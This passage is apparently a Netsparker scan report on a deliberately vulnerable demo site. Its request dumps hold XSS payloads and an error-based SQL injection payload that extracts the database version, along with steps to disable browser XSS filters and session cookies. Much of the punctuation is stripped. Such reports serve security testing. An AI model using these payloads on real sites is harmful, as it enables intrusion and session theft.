ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
92 apiadminhttphackyourselffirsttroyhuntcomapiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt
ParametersParameter Type Value
nsextt GET --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x0002E0)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
RequestGET apiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt3Enetsparker(0x0002E0)3CscRipt3E HTTP11Cache-Control no-cacheAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
28 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
25 Make1 CONFIRMEDhttphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
14 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
15 57
1 TOTALIMPORTANT
CONFIRMED
1
3 Cross-site ScriptingNetsparkerdetectedcross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScript VBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofcross-sitescriptingincluding
HijackingusersactivesessionMountingphishingattacksInterceptingdataandperformingman-in-the-middleattacks
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisoutputshouldbeencodedaccordingtotheoutputlocationandcontextForexampleiftheoutputgoesintoaJavaScriptblockwithintheHTMLdocumentthenoutputneedstobeencodedaccordinglyEncodingcangetverycomplexthereforeitsstronglyrecommendedtouseanencodinglibrarysuchasOWASPESAPIandMicrosoftAnti-cross-sitescripting
Remedy ReferencesMicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
Proof of Concept NotesGeneratedXSSexploitmightnotworkduetobrowserXSSfilteringPleasefollowtheguidelinesbelowinordertodisableXSSfilteringfordifferentbrowsersAlsonotethat
XSSfilteringisafeaturethatsenabledbydefaultinsomeofthemodernbrowsersItshouldonlybedisabledtemporarilytotestexploitsandshouldberevertedbackifthebrowserisactivelyusedotherthantestingpurposesEventhoughbrowsershavecertaincheckstopreventCross-sitescriptingattacksinpracticethereareavarietyofwaystobypassthismechanismthereforeawebapplicationshouldnotrelyonthiskindofclient-sidebrowserchecks
Chrome
OpencommandpromptGotofolderwherechromeexeislocatedRunthecommandchromeexe --args --disable-xss-auditor
InternetExplorer
ClickTools-gtInternetOptionsandthennavigatetotheSecurityTabClickCustomlevelandscrolltowardsthebottomwhereyouwillfindthatEnableXSSfilteriscurrentlyEnabledSetittodisabledClickOKClickYestoacceptthewarningfollowedbyApply
Firefox
GotoaboutconfigintheURLaddressbarInthesearchfieldtypeurlbarfilterandfindbrowserurlbarfilterjavascriptSetitsvaluetofalsebydoubleclickingtherow
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
16 57
31 Search CONFIRMEDhttphackyourselffirsttroyhuntcomSearchsearchTerm=2Bnetsparker(9)2B
ParametersParameter Type Value
searchTerm GET +netsparker(9)+
RequestGET SearchsearchTerm=2Bnetsparker(9)2B HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Responsehellipltsectiongtltdivgtltdivgtltdivgtltdivgtltheadergt
ltdiv class=containergtltsectiongt
lth2gtYou searched for ampquotltspan id=searchTermgt+netsparker(9)+ltspangtampquotlth2gt
ltp class=alert alert-errorgtNo results found for your searchltpgt
ltsectiongtlthrgtltfootergtltpgtampcopy 2014 - Hack Yourself Firstltpgtltfootergt
hellipgtltscriptgt
ltscriptgt$(results tr)click(function () var url = Supercar + $(this)attr(id)windowlocationhref = url)
$(searchTerm)val(+netsparker(9)+)ltscriptgt
ltscriptgt(function (i s o g r a m) i[GoogleAnalyticsObject] = r i[r] = i[r] || function () (i[r]q = i[r]q || [])push(arguments) i[rhellip
17 57
1 TOTALIMPORTANT
CONFIRMED
1
4 Permanent Cross-site ScriptingNetsparkeridentifiedpermanentcross-sitescriptingandconfirmedthisvulnerabilitybyanalyzingtheexecutionofinjectedJavaScript
PermanentXSSallowsanattackertoexecutedynamicscripts(JavaScript VBScript)inthecontextoftheapplicationThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbytheuserhasbeeninterpretedbyHTMLJavaScriptVBScriptwithinthebrowser
PermanentmeansthattheattackwillbestoredinthebackendsystemInnormalXSSattacksanattackerneedstoe-mailthevictimbutinapermanentXSSanattackercanjustexecutetheattackandwaitforuserstoseetheaffectedpageAssoonassomeonevisitsthepagetheattackersstoredpayloadwillgetexecuted
XSStargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitonlyallowsattackerstohijackotheruserssessionstheattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactPermanentXSSisadangerousissuethathasmanyexploitationvectorssomeofwhichinclude
Userssession-sensitiveinformationsuchascookiescanbestolenXSScanenableclient-sidewormswhichcouldmodifydeleteorstealotherusersdatawithintheapplicationThewebsitecanberedirectedtoanewlocationdefacedorusedasaphishingsite
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredOutputshouldbefilteredaccordingtotheoutputformatandlocationTypicallytheoutputlocationisHTMLWheretheoutputisHTMLensureallactivecontentisremovedpriortoitspresentationtotheserver
Priortosanitizinguserinputensureyouhaveapre-definedlistofbothexpectedandacceptablecharacterswithwhichyoupopulateawhitelistThislistneedsonlybedefinedonceandshouldbeusedtosanitizeandvalidateallsubsequentinput
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsgoodexamplesoftheseincludetheOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-Cross-siteScriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
41 Supercar3 CONFIRMEDhttphackyourselffirsttroyhuntcomSupercar3
Injection URLhttphackyourselffirsttroyhuntcomapivote
18 57
Injection RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 77Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=223e3cnet+sparker3dnetsparker(0x00043F)3e
Identification RequestGET Supercar3 HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Injection ResponseHTTP11 201 CreatedCache-Control no-cacheDate Mon 25 Aug 2014 232053 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 0Expires -1
Identification Responsehellip1))ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000))11))0)=1lttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgtgtltnet sparker=netsparker(0x00043F)gtlttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgt-1OR1=1)ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000)hellip
19 57
1 TOTALIMPORTANT
CONFIRMED
1
5 Password Transmitted over HTTPNetsparkerdetectedthatpassworddataisbeingtransmittedoverHTTP
ImpactIfanattackercaninterceptnetworktrafficheshecanstealuserscredentials
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformsandpagestoHTTPSanddonotservethemoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
51 AccountRegister CONFIRMEDhttphackyourselffirsttroyhuntcomAccountRegister
Form target actionhttphackyourselffirsttroyhuntcomAccountRegister
RequestGET AccountRegister HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2265Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtRegister - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
20 57
1 TOTALIMPORTANT
CONFIRMED
1
6 Cookie Not Marked as SecureNetsparkeridentifiedacookienotmarkedassecureandtransmittedoverHTTPS
Thismeansthecookiecouldpotentiallybestolenbyanattackerwhocansuccessfullyinterceptanddecryptthetrafficorfollowingasuccessfulman-in-the-middleattack
ImpactThiscookiewillbetransmittedoveraHTTPconnectionthereforeifthiscookieisimportant(such as a session cookie)anattackermightinterceptitandhijackavictimssessionIftheattackercancarryoutaman-in-the-middleattackheshecanforcethevictimtomakeanHTTPrequesttostealthecookie
Actions to Take1 Seetheremedyforsolution2 Markallcookiesusedwithintheapplicationassecure(If the cookie is not related to authentication or does not carry any personal
information you do not have to mark it as secure)
RemedyMarkallcookiesusedwithintheapplicationassecure
Required Skills for Successful ExploitationToexploitthisissuetheattackerneedstobeabletointercepttrafficThisgenerallyrequireslocalaccesstothewebserverortothevictimsnetworkAttackersneedtobeunderstandlayer2havephysicalaccesstosystemseitheraswaypointsforthetrafficorhavelocallygainedaccesstotoasystembetweenthevictimandthewebserver
External ReferencesNETCookieSecurePropertyHowtoCreateTotallySecureCookies
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-614CAPEC-102WASC-15
61 AccountLogin CONFIRMEDhttpshackyourselffirsttroyhuntcomAccountLogin
Identified CookieAuthCookie
RequestPOST AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccountLoginAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 57Content-Type applicationx-www-form-urlencoded
Email=netsparker40examplecomampPassword=3ampRememberMe=true
21 57
ResponseHTTP11 302 FoundCache-Control privateDate Mon 25 Aug 2014 225900 GMTLocation httphackyourselffirsttroyhuntcomServer Microsoft-IIS80Set-CookieAuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7 expires=Tue 25-Aug-2015 225900 GMT path=Password=Mw== expires=Tue 25-Aug-2015 225900 GMT path=Email=netsparkerexamplecom expires=Tue 25-Aug-2015 225900 GMT path=
X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 155Content-Type texthtml charset=utf-8
lthtmlgtltheadgtlttitlegtObject movedlttitlegtltheadgtltbodygtlth2gtObject moved to lta href=httphackyourselffirsttroyhuntcomgthereltagtlth2gtltbodygtlthtmlgt
22 57
1 TOTALIMPORTANT
7 Out-of-date Version (Microsoft SQL Server)Netsparkeridentifiedyouareusinganout-of-dateversionofMicrosoftSQL
ImpactSincethisisanoldversionofthesoftwareitmaybevulnerabletoattacks
RemedyPleaseupgradeyourinstallationofMicrosoftSQLServertothelateststableversion
ClassificationOWASP2010-A6OWASP2013-A9PCIV20-61PCIV30-61CAPEC-310
71 Make1httphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
Identified Version110922217
Latest Version12002000
Vulnerability DatabaseResult is based on 18082014 vulnerability database content
Certainty
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
23 57
ResponseHTTP11 500 Internal Server ErrorCache-Control privateDate Mon 25 Aug 2014 225955 GMTServer Microsoft-IIS80X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack p font-familyVerdanafont-weightnormalcolorblackmargin-top -5pxb font-familyVerdanafont-weightboldcolorblackmargin-top -5pxH1 font-familyVerdanafont-weightnormalfont-size18ptcolorred H2 font-familyVerdanafont-weightnormalfont-size14ptcolormaroon pre font-familyConsolasLucida ConsoleMonospacefont-size11ptmargin0padding05emline-height14ptmarker font-weight bold color blacktext-decoration noneversion color grayerror margin-bottom 10pxexpandable text-decorationunderline font-weightbold colornavy cursorhand media screen and (max-width 639px) pre width 440px overflow auto white-space pre-wrap word-wrap break-word media screen and (max-width 479px) pre width 280px ltstylegtltheadgt
ltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the execution of the current web request Please reviehellip
24 57
1 TOTALMEDIUM
CONFIRMED
1
8 Critical Form Served over HTTPNetsparkerdetectedthatacriticalformisservedoverHTTP
ImpactIfanattackercancarryoutaman-in-the-middleattackheshemaybeabletointercepttrafficbyinjectingJavaScriptcodeintothispageorchangingactionoftheHTTPcodetostealtheuserspasswordEventhoughthetargetpageisHTTPSthisdoesnotprotectthesystemagainstman-in-the-middleattacks
ThisissueisimportantasitnegatestheuseofSSLasaprivacyprotectionbarrier
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformstoHTTPSanddonotallowthesepagestobeservedoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
81 AccountLogin CONFIRMEDhttphackyourselffirsttroyhuntcomAccountLogin
Form target actionhttpshackyourselffirsttroyhuntcomAccountLogin
